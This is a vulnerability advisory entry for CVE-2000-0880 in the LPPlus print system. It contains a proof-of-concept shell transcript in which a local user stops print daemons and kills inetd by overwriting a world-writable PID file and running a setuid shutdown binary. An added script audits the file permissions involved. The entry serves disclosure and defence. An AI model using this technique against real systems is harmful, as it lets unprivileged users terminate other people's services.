LPPlus Permissions DoS Vulnerability

Vulnerability ID: 1105990
Vulnerability type: Access validation error
Published: 2000-09-06
Updated: 2005-10-20
CVE ID: CVE-2000-0880
CNNVD-ID: CNNVD-200011-021
Platform: Unix
CVSS score: 3.6
|Vulnerability source
https://www.exploit-db.com/exploits/20192
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200011-021
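|Vulnerability details
LPPlus creates the lpdprocess file with world-writable permissions. A local user can interrupt arbitrary processes by specifying an alternate process ID and using the setuid dcclpdshut program to interrupt the process named in the lpdprocess file.
|Vulnerability EXP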
source: http://www.securityfocus.com/bid/1643/info

Vulnerability #1: Several files that are part of the LPPlus print management system are installed setuid root by default. These files include:

$LPHOME/bin/dccsched 
$LPHOME/bin/dcclpdser 
$LPHOME/bin/dccbkst 

These start the scheduler, LPD server and network status daemons.

$LPHOME/bin/dccshut 
$LPHOME/bin/dcclpdshut 
$LPHOME/bin/dccbkstshut

These stop the same services.

By default, all six may be run by a user of any privilege level, allowing any user to start and stop printing services, regardless of userid or group.

Vulnerability #2: $LPHOME/system/lpdprocess is created with mode 777. This file contains the process ID of the dcclpdser process. Because the file is world-writable and dcclpdshut is executable by any user, a user who replaces the PID in $LPHOME/system/lpdprocess with the PID of a target process and then runs $LPHOME/bin/dcclpdshut can send signal 2 (SIGINT) to any process, shutting it down.

Vulnerability #1: 

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep dcc
test 26357 26351 0 18:18:06 pts/0 0:00 grep dcc
root 26262 1 0 17:41:50 ? 0:01 /opt/lpplus/bin/dccsched
root 26272 1 0 17:42:03 ? 0:00 /opt/lpplus/bin/dcclpdser
root 26276 1 0 17:42:14 ? 0:00 /opt/lpplus/bin/dccbkst
$ dccbkstshut
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ dccshut
LPP054I LP Plus scheduler ordered to shutdown.
$ ps -ef|grep dcc 
test 26253 26239 0 17:39:45 pts/0 0:00 grep dcc 
$

Vulnerability #2

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep inet
test 26285 26279 0 17:42:42 pts/0 0:00 grep inet
root 12276 1 0 Aug 22 ? 0:00 /usr/sbin/inetd -s
$ cat > $LPHOME/system/lpdprocess
12276
^D
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ ps -ef|grep inet
test 26291 26279 0 17:45:17 pts/0 0:00 grep inet
$
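
A check for the two conditions described above, written as an added example (not part of the original advisory or of LPPlus). The binary names and the lpdprocess path are taken from the advisory; the function names are hypothetical, and LPHOME is assumed to point at the installation directory.

```shell
#!/bin/sh
# Added example: audit an LPPlus tree for the two conditions in the advisory.
# Binary names and the lpdprocess path come from the advisory; the function
# names are hypothetical. Run with LPHOME set to the installation directory.

LPPLUS_BINS="dccsched dcclpdser dccbkst dccshut dcclpdshut dccbkstshut"

# Print each start/stop binary that is setuid AND executable by "other".
# $1 = LPPlus home directory
setuid_world_exec() {
    for b in $LPPLUS_BINS; do
        f="$1/bin/$b"
        [ -f "$f" ] || continue
        # -perm -4001: setuid bit and other-execute bit are both set
        find -H "$f" -perm -4001 -print
    done
}

# Print the PID file if any user can overwrite it (mode 777 in the advisory).
world_writable_pidfile() {
    f="$1/system/lpdprocess"
    [ -f "$f" ] || return 0
    # -perm -0002: other-write bit is set
    find -H "$f" -perm -0002 -print
}

# Report findings; return 0 when the tree is clean, 1 otherwise.
audit_lpplus() {
    bins=$(setuid_world_exec "$1")
    pidf=$(world_writable_pidfile "$1")
    [ -z "$bins" ] || printf 'FINDING: setuid and runnable by any user:\n%s\n' "$bins"
    [ -z "$pidf" ] || printf 'FINDING: world-writable PID file: %s\n' "$pidf"
    [ -z "$bins$pidf" ]
}

# Audit only when LPHOME points at a real installation.
if [ -n "${LPHOME:-}" ] && [ -d "$LPHOME" ]; then
    audit_lpplus "$LPHOME" || echo "LPPlus file permissions need review"
fi
```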
|References

Source: XF
Name: lpplus-process-perms-dos
Link: http://xforce.iss.net/static/5200.php
Source: BID
Name: 1643
Link: http://www.securityfocus.com/bid/1643
Source: BUGTRAQ
Name: 20000906 Multiple Security Holes in LPPlus
Link: http://archives.neohapsis.com/archives/bugtraq/2000-08/0531.html
